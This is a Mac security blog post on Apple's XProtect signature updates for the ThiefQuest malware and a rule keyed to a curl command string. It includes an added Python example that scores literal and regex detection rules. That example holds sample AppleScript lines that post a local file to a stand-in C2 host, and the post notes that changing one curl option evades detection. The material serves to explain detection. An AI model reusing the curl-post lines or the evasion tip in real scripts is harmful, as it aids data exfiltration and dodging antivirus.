Last Week on My Mac: Malware detection games

macOS security protection comes and goes. Until almost a year ago, Gatekeeper and MRT were all the rage, and every couple of weeks, Apple pushed updates to them both. Gatekeeper went from version 162 in February 2019 to 181 by August of last year; MRT progressed from 1.39 to 1.48 over the same period, as XProtect crawled from 2101 to a mere 2105.

Catalina brought very different patterns: over the last year, Gatekeeper seems to have been forgotten, with XProtect and MRT forging ahead, their updates being pushed every two weeks until WWDC broke that rhythm. Then, between 29 June and 13 July, we’ve gone through three versions of XProtect’s data files, 2124, 2125 and 2126.

This emphasis on XProtect is because of changed security policies. In Catalina, whenever you open an app or run a command tool, irrespective of whether it has a quarantine flag attached, it’s passed to XProtect to check it for malware. Gatekeeper’s signature checks have been eclipsed by the requirement not just for code signing, but for notarization as well. These leave users of older versions of macOS out on a limb, though, with XProtect checks only being called when the quarantine flag is set, and nothing to require notarization.

Discovering what has changed in each of these security data updates has become a childish game. Instead of XProtect’s detection rules referring to malware by its generally recognised names (as it once did), Apple now uses a coded naming system, which security researchers then have to decode to discover what each update does. The last two updates, XProtect 2125 and 2126, haven’t taken much effort, in view of the recent appearance of ThiefQuest/EvilQuest, which at first appeared to be simple ransomware, but turns out to be rather more sophisticated.

Apple pushed XProtect 2125 out of cycle, with a single added detection rule, for something it named MACOS.6cb9746. As soon as I saw that, I suspected that this was an attempt to detect ThiefQuest, which Patrick Wardle quickly confirmed against his sample of the malware. Breaking Apple’s codename thus proved rather easier than some of my weekend Mac riddles. Where Apple had fallen short was in detecting only one of the two variants of ThiefQuest which have been found, something as easy to discover as the identity of MACOS.6cb9746.

A week later, Apple pushed another out of cycle update to XProtect’s data, version 2126. This modifies the detection signature for ThiefQuest/MACOS.6cb9746 to enable detection of both current variants, and adds detection of new malware named so helpfully MACOS.2070d41. Although I’m not aware that the latter has been identified against anything specific, security researchers quickly discovered that its signature was the compiled AppleScript string based on the shell command
curl --connect-timeout 10 -ks -d

Although I doubt whether it’s particularly common, that could of course occur in perfectly innocent AppleScript. What’s more, it’s easily changed in malware to evade detection by XProtect: all the malware author has to do is to change the --connect-timeout setting to a different number.

In the course of the current Covid-19 pandemic, we’ve all become armchair experts on clinical testing. Concepts such as false positives and negatives, and test sensitivity and specificity, have become widely discussed, and I’m sure that you can see their relevance here. XProtect, Catalina’s front line malware diagnostic system, has here demonstrated one rule for detecting ThiefQuest/MACOS.6cb9746 which should already have been known to have a high false negative rate. In the next version, Apple had to fix that, and added a new rule which, the moment it appeared, must have had a significant false positive rate and a rapidly growing false negative rate.
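The brittleness of a literal string signature, and the false positive and false negative rates just discussed, can be seen in a small experiment. This is an added example, not code from this post or from Apple's XProtect data: it models the MACOS.2070d41 signature as a plain substring match (the real rule is a YARA rule over the bytes of a compiled AppleScript), puts beside it a hypothetical pattern rule of my own that tolerates any timeout value, and runs both over five constructed AppleScript snippets (two labelled malicious, three benign) to compute sensitivity and specificity for each rule.

```python
import re

# The signature string quoted in the post, matched literally.
LITERAL_SIGNATURE = b"curl --connect-timeout 10 -ks -d"

# Hypothetical broader rule (my own, not Apple's): any timeout value is accepted.
PATTERN_SIGNATURE = re.compile(rb"curl --connect-timeout \d+ -ks -d")


def literal_rule(sample: bytes) -> bool:
    """Detect if the exact signature string occurs in the sample."""
    return LITERAL_SIGNATURE in sample


def pattern_rule(sample: bytes) -> bool:
    """Detect if the signature occurs with any numeric --connect-timeout value."""
    return PATTERN_SIGNATURE.search(sample) is not None


# Constructed test corpus: (label, script text). None of these is real malware;
# the hosts are reserved .invalid names and the scripts do nothing harmful.
SAMPLES = [
    ("malicious", b'do shell script "curl --connect-timeout 10 -ks -d @/tmp/r https://c2.example.invalid/"'),
    # Same script with the timeout changed, the variation the post describes.
    ("malicious", b'do shell script "curl --connect-timeout 30 -ks -d @/tmp/r https://c2.example.invalid/"'),
    # An innocent script that happens to use exactly the same curl options.
    ("benign", b'do shell script "curl --connect-timeout 10 -ks -d status=ok https://api.example.invalid/ping"'),
    ("benign", b'do shell script "curl -s https://www.example.invalid/version.txt"'),
    ("benign", b'display dialog "Backup finished"'),
]


def evaluate(rule, samples):
    """Return the confusion matrix plus sensitivity and specificity for one rule."""
    tp = fp = tn = fn = 0
    for label, script in samples:
        hit = rule(script)
        if label == "malicious":
            if hit:
                tp += 1
            else:
                fn += 1   # missed malware: a false negative
        else:
            if hit:
                fp += 1   # innocent script flagged: a false positive
            else:
                tn += 1
    sensitivity = tp / (tp + fn) if (tp + fn) else 0.0   # share of malware caught
    specificity = tn / (tn + fp) if (tn + fp) else 0.0   # share of benign passed
    return {"tp": tp, "fp": fp, "tn": tn, "fn": fn,
            "sensitivity": sensitivity, "specificity": specificity}


if __name__ == "__main__":
    for name, rule in (("literal", literal_rule), ("pattern", pattern_rule)):
        r = evaluate(rule, SAMPLES)
        print(f"{name:8s} TP={r['tp']} FN={r['fn']} FP={r['fp']} TN={r['tn']} "
              f"sensitivity={r['sensitivity']:.2f} specificity={r['specificity']:.2f}")
```

On this corpus the literal rule misses the second malicious sample (sensitivity 0.5) while the pattern rule catches both (sensitivity 1.0); neither rule can tell the innocent third script apart from the malicious ones, so both have the same specificity. That is the trade-off the post is pointing at: a signature built on a common command line can be widened to cut false negatives, but nothing in the string itself distinguishes malicious use from legitimate use, so the false positive rate stays where it was.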

If you’re running Catalina or later, XProtect is proving good protection against the malware of a couple of weeks ago. Much depends, though, on those writing its detection rules achieving excellent sensitivity and specificity, as with any diagnostic test. Most importantly, it provides no protection at all against emergent malware. Until Apple has a sample to test against, constructs and assesses a rule, and pushes the next update to XProtect’s data, no Mac user is protected from that malware. Over a period of 7-10 days, that can put an awful lot of users at risk.

Signature-based malware detection is the oldest technique, and well-known for this ceaseless game of cat and mouse. Apple’s Tom has been chasing hard again, but I can’t see that he has got any closer to catching Jerry.